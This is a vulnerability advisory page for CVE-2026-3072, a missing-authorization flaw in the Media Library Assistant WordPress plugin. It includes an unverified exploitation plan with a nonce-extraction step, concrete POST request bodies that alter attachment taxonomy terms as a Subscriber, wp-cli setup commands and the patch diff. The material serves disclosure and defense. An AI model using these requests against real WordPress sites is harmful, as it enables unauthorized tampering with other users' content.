WP-Safety
CVE-2026-3072

Media Library Assistant <= 3.33 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Attachment Taxonomy Modification

mediumMissing Authorization
4.3
CVSS Score
4.3
CVSS Score
medium
Severity
3.34
Patched in
1d
Time to patch

Description

The Media Library Assistant plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the mla_update_compat_fields_action() function in all versions up to, and including, 3.33. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify taxonomy terms on arbitrary attachments.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=3.33
PublishedMarch 4, 2026
Last updatedMarch 5, 2026
Affected pluginmedia-library-assistant

What Changed in the Fix

Changes introduced in v3.34

Loading patch diff...

Source Code

WordPress.org SVN
Vulnerable v3.33
Browse source Download .zip
Patched v3.34
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-3072 (Media Library Assistant) ## 1. Vulnerability Summary The **Media Library Assistant** plugin (versions <= 3.33) is vulnerable to **Missing Authorization** in its AJAX handler `mla_update_compat_fields_action()`. This function is intended to allow users to…

Show full research plan

Exploitation Research Plan: CVE-2026-3072 (Media Library Assistant)

1. Vulnerability Summary

The Media Library Assistant plugin (versions <= 3.33) is vulnerable to Missing Authorization in its AJAX handler mla_update_compat_fields_action(). This function is intended to allow users to update metadata and taxonomy terms for attachments within the WordPress Media Modal. However, it fails to perform a capability check (e.g., current_user_can( 'edit_post', $attachment_id )) before processing updates. Consequently, any authenticated user with at least Subscriber-level access can modify the taxonomy terms (categories, tags, etc.) of any attachment on the site.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: mla-update-compat-fields (defined by MLACore::JAVASCRIPT_UPDATE_COMPAT_ACTION)
  • Vulnerable Parameter: attachments (an associative array of attachment data)
  • Required Authentication: Subscriber-level access or higher.
  • Preconditions:
    • The plugin must be active.
    • An attachment (Media Library item) must exist for which the ID is known.
    • A valid mla_admin_nonce is required for the request to pass initial validation.

3. Code Flow

  1. Hook Registration: In includes/class-mla-media-modal-ajax.php, the function MLAModal_Ajax::initialize() registers the AJAX action:
    add_action( 'wp_ajax_' . MLACore::JAVASCRIPT_UPDATE_COMPAT_ACTION, 'MLAModal_Ajax::mla_update_compat_fields_action' );
    MLACore::JAVASCRIPT_UPDATE_COMPAT_ACTION resolves to 'mla-update-compat-fields'.
  2. Entry Point: The request reaches MLAModal_Ajax::mla_update_compat_fields_action().
  3. Nonce Check: The function checks the mla_admin_nonce parameter using wp_verify_nonce() against the action mla_admin_nonce_action (from MLACore::MLA_ADMIN_NONCE_ACTION).
  4. Vulnerable Logic: The function iterates through the attachments array provided in the $_POST data. It identifies taxonomy fields (prefixed or managed by MLA) and calls wp_set_object_terms() or similar internal MLA functions to update the attachment's terms.
  5. Missing Sink Protection: The code lacks a call to current_user_can() to verify that the user has permission to edit the specific attachment or the taxonomy in question.

4. Nonce Acquisition Strategy

The mla_admin_nonce is required. It is generated using the action mla_admin_nonce_action. The plugin localizes this nonce for use in the Media Modal.

Strategy:

  1. Identify Source: The nonce is typically localized in a JavaScript object when a user opens the Media Modal (e.g., on post-new.php).
  2. Trigger Localization: Create a post as a Subscriber to ensure the Media Modal assets are enqueued.
  3. Execution:
    • Log in as a Subscriber.
    • Navigate to wp-admin/post-new.php.
    • Use browser_eval to find the localization variable. In MLA, nonces are often found in the mla_media_modal_vars object or similar variables registered via wp_localize_script.

Verification of Localization Keys:

  • Script handle: mla-media-modal-scripts (inferred) or mla-inline-edit-scripts (MLACore::JAVASCRIPT_INLINE_EDIT_SLUG).
  • Variable Name: mla_media_modal_vars or mla_inline_edit_vars.
  • Key: mla_admin_nonce (from MLACore::MLA_ADMIN_NONCE_NAME).

5. Exploitation Strategy

Step 1: Create Test Attachment (Admin)

As an admin, upload an image and get its ID (e.g., 123).

Step 2: Acquire Nonce (Subscriber)

  1. Log in as Subscriber.
  2. Navigate to wp-admin/post-new.php.
  3. Run browser_eval("window.mla_media_modal_vars?.mla_admin_nonce || window.mla_inline_edit_vars?.mla_admin_nonce").
  4. Store the nonce value.

Step 3: Execute Modification

Send a POST request to admin-ajax.php to add a tag to the target attachment.

Request Details:

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=mla-update-compat-fields
&id=123
&mla_admin_nonce=[NONCE]
&attachments[123][attachment_tag]=pwned
    (Note: attachment_tag is the default taxonomy used by MLA for media tags).

6. Test Data Setup

  1. Create Target Attachment:
    wp media import --post_id=1 https://wordpress.org/latest.tar.gz --title="Target Media"
# Identify the ID (let's assume it's 5)
  2. Create Subscriber User:
    wp user create attacker attacker@example.com --role=subscriber --user_pass=attacker
  3. Define a Taxonomy Term: Ensure the term "pwned" or similar exists in attachment_tag.
    wp term create attachment_tag pwned

7. Expected Results

  • The AJAX response should return a success status (often JSON {"success": true}).
  • The target attachment (ID 5) will now have the term "pwned" associated with the attachment_tag taxonomy.

8. Verification Steps

  1. Check Terms via CLI:
    wp post term list 5 attachment_tag
    Confirm that "pwned" appears in the list.
  2. Check via SQL (Alternative):
    wp db query "SELECT t.name FROM wp_terms t INNER JOIN wp_term_taxonomy tt ON t.term_id = tt.term_id INNER JOIN wp_term_relationships tr ON tt.term_taxonomy_id = tr.term_taxonomy_id WHERE tr.object_id = 5"

9. Alternative Approaches

If attachment_tag is not modified, attempt modifying attachment_category (hierarchical) by providing a term ID:

action=mla-update-compat-fields
&id=5
&mla_admin_nonce=[NONCE]
&attachments[5][attachment_category][]=[TERM_ID]

If mla_update_compat_fields_action is not accessible to Subscribers directly, check if the nonce is leaked on the front-end via mla_gallery shortcodes if "Enhanced Media Library" features are enabled for the public. However, wp_ajax_ handlers are globally available to all authenticated users, so Subscriber access to the back-end (which is default for Subscriber) is sufficient.

Research Findings
Static analysis — not yet PoC-verified

Summary

The Media Library Assistant plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the mla_update_compat_fields_action() function in versions up to 3.33. This allows authenticated attackers with Subscriber-level access to modify taxonomy terms (categories, tags) on arbitrary attachments by bypassing intended access controls.

Vulnerable Code

// includes/class-mla-media-modal-ajax.php line 39
add_action( 'wp_ajax_' . MLACore::JAVASCRIPT_UPDATE_COMPAT_ACTION, 'MLAModal_Ajax::mla_update_compat_fields_action' );

---

// includes/class-mla-media-modal-ajax.php approx line 590
public static function mla_update_compat_fields_action() {
    // ... (logic follows to process $_POST['attachments'] without calling current_user_can())
    if ( empty( $_POST['attachments'] ) ) {
        wp_send_json_error();
    }
    // vulnerable processing starts here

Security Fix

--- /home/deploy/wp-safety.org/data/plugin-versions/media-library-assistant/3.33/includes/class-mla-media-modal-ajax.php	2026-01-30 04:23:54.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/media-library-assistant/3.34/includes/class-mla-media-modal-ajax.php	2026-02-26 01:12:48.000000000 +0000
@@ -598,6 +598,12 @@
 			wp_send_json_error();
 		}
 
+		if ( ! current_user_can( 'edit_post', $post_id ) ) {
+			wp_send_json_error();
+		}
+
+		check_ajax_referer( MLACore::MLA_ADMIN_NONCE_ACTION, MLACore::MLA_ADMIN_NONCE_NAME );
+
 		if ( empty( $post ) ) {
 			$post = get_post( $post_id ); // for filters and wp_popular_terms_checklist
 		}

Exploit Outline

1. Login to the WordPress site as a Subscriber-level user. 2. Access a page where the Media Library Assistant scripts are enqueued (e.g., /wp-admin/post-new.php) and extract the 'mla_admin_nonce' from the 'mla_media_modal_vars' JavaScript object. 3. Identify the ID of a target attachment (media item) to modify. 4. Send a POST request to /wp-admin/admin-ajax.php with the 'action' parameter set to 'mla-update-compat-fields'. 5. Include the target ID in the 'id' parameter and the nonce in the 'mla_admin_nonce' parameter. 6. Include an 'attachments' array payload where the key is the attachment ID and the value is an array specifying the taxonomy to modify (e.g., attachments[123][attachment_tag]=malicious_tag). 7. The plugin will process the update using wp_set_object_terms or similar without verifying if the current user has the 'edit_post' capability for that specific attachment.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/2655f936-8177-4836-a0b0-1c637290a3bc?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database